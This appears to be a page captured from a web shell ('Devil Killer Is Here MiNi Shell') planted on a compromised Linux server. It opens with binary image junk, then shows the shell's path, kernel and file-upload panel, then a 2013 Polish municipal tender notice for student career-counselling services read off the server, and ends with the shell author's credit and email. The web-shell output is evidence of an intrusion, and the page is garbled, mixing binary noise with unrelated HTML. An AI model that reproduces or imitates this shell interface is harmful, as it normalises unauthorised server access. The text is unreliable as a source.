JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130122/30532-N-2013.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonanie usługi przeprowadzenia zajęć z indywidualnego doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Miasta Siemianowice Śląskie w roku szkolnym 2012/2013 uczestniczących w projekcie systemowym: Mam zawód - mam pracę w regionie realizowanym w ramach Priorytetu IX, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007 - 2013</b><br>
<b>Numer ogłoszenia: 30532 - 2013; data zamieszczenia: 22.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Siemianowice  Śląskie , ul. Jana Pawła II 10, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 32 7605200, faks 32 7605280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.siemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi przeprowadzenia zajęć z indywidualnego doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Miasta Siemianowice Śląskie w roku szkolnym 2012/2013 uczestniczących w projekcie systemowym: Mam zawód - mam pracę w regionie realizowanym w ramach Priorytetu IX, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007 - 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia są usługi polegające na przeprowadzeniu zajęć z indywidualnego doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Miasta Siemianowice Śląskie w roku szkolnym 2012/2013 uczestniczących w projekcie systemowym: Mam zawód - mam pracę w regionie, realizowanym w ramach Priorytetu IX, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007 - 2013.   
II. Przedmiot zamówienia finansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach projektu systemowego pn. Mam zawód - mam pracę w regionie, Priorytet IX Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego,  Programu Operacyjnego Kapitał Ludzki 2007-2013.
Liderem projektu jest Województwo Śląskie. Na podstawie zawartej Umowy Partnerskiej na rzecz realizacji projektu systemowego: Mam zawód  - mam pracę w regionie, Miasto Siemianowice Śląskie wraz z Kuratorium Oświaty w Katowicach i innymi powiatami oraz miastami na prawie powiatu w województwie śląskim jest współrealizatorem projektu. 
Celem głównym projektu jest zwiększenie atrakcyjności, jakości oraz prestiżu   szkół/placówek kształcenia zawodowego w województwie śląskim w latach 2011 - 2013.
III.  Usługi z zakresu  indywidualnego doradztwa zawodowego zostaną zrealizowane w trzech szkołach ponadgimnazjalnych o profilu zawodowym w Siemianowicach Śląskich:
1.Technikum Nr 1 Zespołu Szkół Ponadgimnazjalnych Cogito, z siedzibą przy ul. Matejki 5;
2. Technikum Nr 2 Zespołu Szkół Technicznych i Ogólnokształcących MERITUM, z siedzibą przy ul. Katowickiej 1;
3. Zasadniczej Szkole Zawodowej Nr 3 Zespołu Szkół Specjalnych, z siedzibą przy ul. Myśliwieckiej 6.
IV. Zajęcia z indywidualnego doradztwa zawodowego zostaną przeprowadzone łącznie dla 77 uczniów z trzech szkół ponadgimnazjalnych:
1. Technikum Nr 1 Zespołu Szkół Ponadgimnazjalnych Cogito, ul. Matejki 5 maksymalnie dla 42 osób o wymiarze 378 godzin lekcyjnych (9 godz. lekcyjnych na jednego uczestnika x 42 osoby),
2. Technikum Nr 2 Zespołu Szkół Technicznych i Ogólnokształcących MERITUM, ul. Katowicka 1 - maksymalnie dla 28 osób o wymiarze 252 godzin lekcyjnych (9 godz. lekcyjnych  na jednego uczestnika x 28 osób),
3. Zasadniczej Szkole Zawodowej Nr 3 Zespołu Szkół Specjalnych, ul. Myśliwieckiej 6 - maksymalnie dla 7 osób o wymiarze 63 godzin lekcyjnych (9 godz. lekcyjnych na jednego uczestnika x 7 osób),
Uczniowie będący odbiorcami wsparcia z doradztwa indywidualnego zostaną wyłonieni spośród uczestników projektu skierowanych na zajęcia z doradztwa grupowego z danej w/w szkoły ponadgimnazjalnej.
Zajęcia obejmą wymiar łącznie 693 godzin lekcyjnych dla wszystkich uczestników (jedna godzina lekcyjna trwa 45 minut). Na każdego ucznia (z 77 uczestników projektu) przypadać będzie 9 godz. lekcyjnych z zajęć z indywidualnego doradztwa zawodowego. Zajęcia będą się odbywały w dni powszednie, w godzinach nie pokrywających się z godzinami zajęć szkolnych uczestników lub w inne dni oprócz niedziel i dni ustawowo wolnych od pracy, na podstawie ustalonego harmonogramu, zaakceptowanego uprzednio przez Zamawiającego i Dyrektora danej placówki. 
V. Wykonawca w zakresie przedmiotu zamówienia zobowiązany będzie do:
1. Zapewnienia:
a) co najmniej 10 (dziesięciu) konsultantów zawodowych, którzy przeprowadzą zajęcia z indywidualnego doradztwa zawodowego w dwóch szkołach ponadgimnazjalnych (Technikum Nr 1 Zespołu Szkół Ponadgimnazjalnych Cogito, ul. Matejki 5 oraz Technikum Nr 2 Zespołu Szkół Technicznych i Ogólnokształcących MERITUM, ul. Katowicka 1) i posiadają odpowiednie kwalifikacje do świadczenia usług z doradztwa zawodowego zgodnie z: 
- § 22 Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku  w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r., Nr 50, poz. 400 z późn. zm.) 
 lub
- art. 94 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz. U. 2008, Nr 69, poz.415 z późn. zm.) 
oraz 
b) co najmniej 1 (jednego) konsultanta zawodowego, który przeprowadzi zajęcia z indywidualnego  doradztwa zawodowego w szkole ponadgimnazjalnej specjalnej (Zasadniczej Szkole Zawodowej Nr 3 Zespołu Szkół Specjalnych, ul. Myśliwieckiej 6) i posiada odpowiednie kwalifikacje do świadczenia usług z doradztwa zawodowego zgodnie z: 
- § 22 pkt 3 Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku  w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r., Nr 50, poz. 400 z późn. zm.) 
lub 
- art. 94 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz. U. 2008, Nr 69, poz.415 z późn. zm.) oraz musi posiadać kwalifikacje do zajmowania stanowiska nauczyciela - doradcy zawodowego uprawniające do pracy w szkołach ponadgimnazjalnych specjalnych (w oparciu o § 22 pkt 3 Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli).
Ponadto, Zamawiający nie dopuszcza, aby jeden konsultant prowadził zajęcia dla więcej  niż 7 (siedmiu) uczestników projektu.
2. przeprowadzenia przez konsultantów zajęć z indywidualnego doradztwa zawodowego w oparciu o podręcznik dla konsultantów zawodowych: Mam zawód mam pracę w regionie dostarczony przez Zamawiającego (Dodatek nr 7 do SIWZ)  oraz na bazie scenariuszy zajęć przygotowanych przez konsultantów, 
3. prowadzenia zajęć z indywidualnego doradztwa przez konsultantów zawodowych w taki sposób, by ukierunkować każdego uczestnika na jego rozwój zawodowy. Efektem realizacji zajęć będzie opracowanie Indywidualnego Planu Rozwoju Zawodowego Uczestnika Projektu, w którym konsultant zawodowy na podstawie zdiagnozowanych predyspozycji, oczekiwań oraz potrzeb ucznia, zaproponuje oferowane w projekcie systemowym: Mam zawód - mam pracę w regionie, formy wsparcia w ramach pakietu wsparcia tj.: kursy/ kursy certyfikowane, zajęcia pozalekcyjne/ pozaszkolne, zajęcia dodatkowe, praktyki zawodowe, wizyty studyjne; uszeregowane od najbardziej preferowanej (przydatnej zawodowo) dla danego uczestnika projektu,
4. zdiagnozowania przez konsultantów zawodowych problemów uczestników w zakresie uzyskiwania wiedzy i kompetencji zawodowych oraz wskazania możliwości szukania pracy i  umiejętności planowania kariery zawodowej,
5. udzielania przez konsultantów informacji i porad uczestnikom projektu w zakresie informacji o zawodach, rynku pracy, możliwościach dalszego kształcenia i szkolenia, wymaganiach stawianych kandydatom dla danego zawodu,
6. przeprowadzenia przez konsultantów zawodowych na ostatnich zajęciach z doradztwa indywidualnego z każdym uczestnikiem badań ankietowych. 
7. zapewnienia niezbędnych materiałów dydaktycznych (m. in. kserokopii testów, ćwiczeń, zadań), celem zrealizowania przedmiotu zamówienia,
8. stosowania właściwego oznakowania i informowania o współfinansowaniu projektu na wszystkich dokumentach projektowych, zgodnie z aktualnymi wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, które dostępne są na stronie www.efs.slaskie.pl (zakładka: Promocja PO KL/Wytyczne dotyczące oznaczania projektów w ramach PO KL - luty 2009 r).
9. prowadzenia przez konsultantów zawodowych dzienników zajęć, list obecności i kart czasu pracy,
10. udzielania niezwłocznych wyjaśnień i informowania Biura Projektu o zaistniałych problemach w realizacji zadania. 
Zamawiający nie będzie pokrywać kosztów dojazdu konsultantów na zajęcia oraz wszelkich innych kosztów związanych ze świadczeniem usługi, w tym kosztów zapewnienia pomocy dydaktycznych, wydruku materiałów, wyżywienia czy noclegów konsultantów zawodowych.
VI. Przedmiot zamówienia, w odniesieniu do każdej grupy w danej placówce oświatowej, będzie realizowany zgodnie z harmonogramem. W terminie do 3 dni od dnia podpisania umowy Wykonawca przedstawi Zamawiającemu harmonogram zajęć dla danej grupy  uczestników w każdej z trzech siemianowickich szkół ponadgimnazjalnych, sporządzony z uwzględnieniem planów lekcji w/w placówek oświatowych oraz scenariusz zajęć dla każdej szkoły. Przedstawiony harmonogram będzie podlegał zatwierdzeniu przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje, co najmniej:
a) 10 (dziesięcioma) osobami, które:
- przeprowadziły, w okresie ostatnich 3 lat przed upływem terminu składania ofert, zajęcia z zakresu indywidualnego doradztwa zawodowego w szkole ponadgimnazjalnej, w liczbie nie mniejszej niż 60 godzin lekcyjnych każda osoba oraz 
b) jedną (1) osobą, która:
- przeprowadziła, w okresie ostatnich 3 lat przed upływem terminu składania ofert zajęcia z zakresu indywidualnego doradztwa zawodowego w szkole specjalnej, w liczbie nie mniejszej niż 60 godzin lekcyjnych. 
Opis sposobu dokonywania oceny spełniania w/w warunków udziału w postępowaniu:
- Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie wymienionych w pkt. VI  dokumentów i oświadczeń złożonych przez Wykonawcę wraz z ofertą.
- Oświadczenia i dokumenty będą oceniane pod względem formalno - prawnym, pod względem ich aktualności i treści, a także, czy informacje w nich zawarte potwierdzają spełnienie warunków udziału w postępowaniu,
- Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny z formułą spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza winien przedłożyć Zamawiającemu przed podpisaniem umowy dokumenty potwierdzające kwalifikacje osób wskazanych w Wykazie osób (załącznik nr 3 do oferty) do prowadzenia zajęć z indywidualnego doradztwa zawodowego w danej szkole - należy przedłożyć do wglądu oryginały dokumentów i kserokopie dokumentów potwierdzonych za zgodność przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość następujących zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
a) zmiana osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności w przypadku:
- choroby, śmierci lub innych zdarzeń losowych osoby prowadzącej zajęcia;
- nie wywiązania się osoby prowadzącej zajęcia z obowiązków wynikających z Umowy;
- jeżeli zmiana osoby prowadzącej zajęcia stanie się konieczna z jakichkolwiek innych przyczyn  niezależnych od Wykonawcy (np. rezygnacja);
Wykonawca, w terminie wskazanym przez Zamawiającego, dokona zmiany osoby prowadzącej zajęcia na żądanie Zamawiającego, który uzna, że osoba ta nie wykonuje swoich obowiązków wynikających z umowy.
W przypadku zmiany osoby prowadzącej zajęcia, nowa osoba musi spełniać wymagania określone dla danej osoby. Zmiany umowy mogą zostać dokonane pod warunkiem przedłożenia Zamawiającemu dokumentów potwierdzających kwalifikacje osoby prowadzącej zajęcia oraz wyrażenia pisemnej zgody przez Zamawiającego na tę zmianę. Brak akceptacji Zamawiającego, stanowi podstawę do odstąpienia od Umowy przez Zamawiającego z winy Wykonawcy.
Wszystkie zmiany treści umowy wymagają zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.msiemianowicesl.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Siemianowice Śląskie, ul. Michałkowicka105, Referat Obsługi Programów Pomocowych, pokój nr 31 lub za zaliczeniem pocztowym, po wcześniejszym załozeniu wniosku. Cena SIWZ 33 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2013 godzina 09:00, miejsce: Ofertę należy złożyć w Urzędzie Miasta Siemianowice Śląskie, przy ul. Michałkowickiej 105,  41 - 103 Siemianowice Śląskie, w Biurze Obsługi Mieszkańców - Kancelaria Podawcza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia finansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach projektu systemowego pn.: Mam zawód - mam pracę w regionie, Priorytet IX, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, Programu Operacyjnego Kapitał Ludzki 2007-2013. Liderem projektu jest Województwo Śląskie. Na podstawie zawartej Umowy Partnerskiej na rzecz realizacji projektu systemowego: Mam zawód  - mam pracę w regionie, Miasto Siemianowice Śląskie wraz z Kuratorium Oświaty w Katowicach i innymi powiatami oraz miastami na prawie powiatu w województwie śląskim jest współrealizatorem projektu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com